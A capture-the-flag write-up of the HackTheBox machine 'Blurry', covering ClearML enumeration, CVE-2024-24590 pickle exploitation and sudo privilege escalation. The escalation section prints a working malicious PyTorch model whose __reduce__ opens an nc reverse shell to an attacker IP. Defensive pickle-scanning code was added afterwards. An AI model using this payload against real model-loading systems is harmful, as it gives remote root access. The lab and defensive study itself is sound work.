Exploring Blurry: Medium Machine by HackTheBox

August 17, 2024

Quick note: This post is not a detailed walkthrough of the box. The box is currently active.

This post will share my exploration of the HTB Medium Machine "Blurry".

Enumeration

As always, I began with nmap and found an open http server.

The server appears to be running SSH and a web application (app.blurry.htb). We could go further and enumerate subdomains, but the web application looks like the most likely way in, so let's explore it.

I found a ClearML web application. My research found that it is a platform used to build machine learning solutions. We can submit any name and create projects as a developer. During setup we need to remember to add two subdomains, api.blurry.htb and files.blurry.htb, to the /etc/hosts file.

We can then execute clearml-init and paste the configuration information we get from the experiment creation.

After searching for vulnerabilities, we find that there are a few that might be interesting. https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

  • CVE-2024-24590: Pickle Load on Artifact Get
  • CVE-2024-24591: Path Traversal on File Download
  • CVE-2024-24592: Improper Auth Leading to Arbitrary Read-Write Access
  • CVE-2024-24593: Cross-Site Request Forgery in ClearML Server
  • CVE-2024-24594: Web Server Renders User HTML Leading to XSS
  • CVE-2024-24595: Credentials Stored in Plaintext in MongoDB Instance

Initial Foothold

We aim to get a reverse shell, so we will use CVE-2024-24590. This vulnerability lets an attacker create a Pickle file that contains a shell command, upload it as an artifact to the project, and have that command executed whenever the artifact is loaded.

A good up-to-date exploit can be found on GitHub: https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit. Start an nc listener and wait for the shell.

After we execute the exploit, it should take a couple of seconds and then we have a shell.

Upgrade our shell to an interactive shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'

We have the user flag and are logged in as jippity.

If possible, we should get the ssh key and just ssh into the box.
Privilege Escalation

Running sudo -l shows us that:

User jippity may run the following commands on blurry: (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth

We can see that evaluate_model is a script that takes a file ending in .pth from the models directory, strips what it considers malicious content, and then runs it. We need to create a model that somehow runs a reverse shell; since the script is run as root via sudo, we will get root.

I found this Python script online; it creates what is essentially a blank model. When this model is serialized (saved), pickle calls its __reduce__ method, and when the saved file is deserialized (loaded), the command it returned is executed. Documentation for the PyTorch library can be found here: https://pytorch.org/docs/stable/index.html.

import torch
import torch.nn as nn
import os

class MaliciousModel(nn.Module):
    def __init__(self):
        super(MaliciousModel, self).__init__()
        # A single linear layer so the object still looks like an ordinary model
        self.dense = nn.Linear(10, 1)

    def forward(self, testing):
        return self.dense(testing)

    # pickle calls __reduce__ while torch.save serializes the object; the
    # (callable, args) pair it returns is what runs when the file is loaded again
    def __reduce__(self):
        cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.18 4443 >/tmp/f"
        return os.system, (cmd,)

malicious_model = MaliciousModel()

# Writes the pickled model, including the __reduce__ payload, to testing.pth
torch.save(malicious_model, 'testing.pth')
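A defender's counterpart to the script above, added here and not part of the original post: it statically lists the globals a pickle-based .pth file would import and refuses to unpickle anything outside an allowlist, so a __reduce__ payload pointing at os.system is rejected before the command can run. The fixtures are constructed with plain pickle so no torch install is needed, the allowlist is illustrative, and a real torch.save archive is a zip whose data.pkl member is the stream to scan.

```python
import collections
import io
import os
import pickle
import pickletools

# Constructed allowlist of (module, name) globals a state_dict file may reference; a real
# PyTorch allowlist also needs torch's tensor rebuild helpers such as
# ("torch._utils", "_rebuild_tensor_v2").
ALLOWED_GLOBALS = {("collections", "OrderedDict")}

def referenced_globals(data: bytes) -> list:
    # Static scan: pickletools.genops only decodes opcodes, so nothing in the file runs.
    refs, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":            # protocols 0-3: arg is "module name"
            refs.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":    # protocol 4+: module and name were pushed as strings
            refs.append((strings[-2], strings[-1]))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
    return refs

def disallowed_globals(data: bytes) -> list:
    # What an evaluate_model-style pre-check should refuse before loading the file.
    return [ref for ref in referenced_globals(data) if ref not in ALLOWED_GLOBALS]

class RestrictedUnpickler(pickle.Unpickler):
    # find_class is consulted when a GLOBAL is resolved, before any REDUCE can call it,
    # so a __reduce__ payload pointing at os.system is refused before the command runs.
    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)

def try_safe_load(data: bytes):
    # ("ok", obj) for an allowlisted stream, ("blocked", reason) otherwise; never raises.
    try:
        return "ok", RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return "blocked", str(exc)

# Constructed fixtures: a benign state_dict-like pickle and one that references os.system.
def benign_blob() -> bytes:
    return pickle.dumps(collections.OrderedDict([("dense.bias", [0.0])]))

def suspicious_blob() -> bytes:
    return pickle.dumps(os.system)  # only a reference; neither dumps nor the scan executes it
```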

After starting an nc listener on port 4443 on our attacking VM and executing the "evaluate_model" script on the model as sudo:

We have access to a root shell.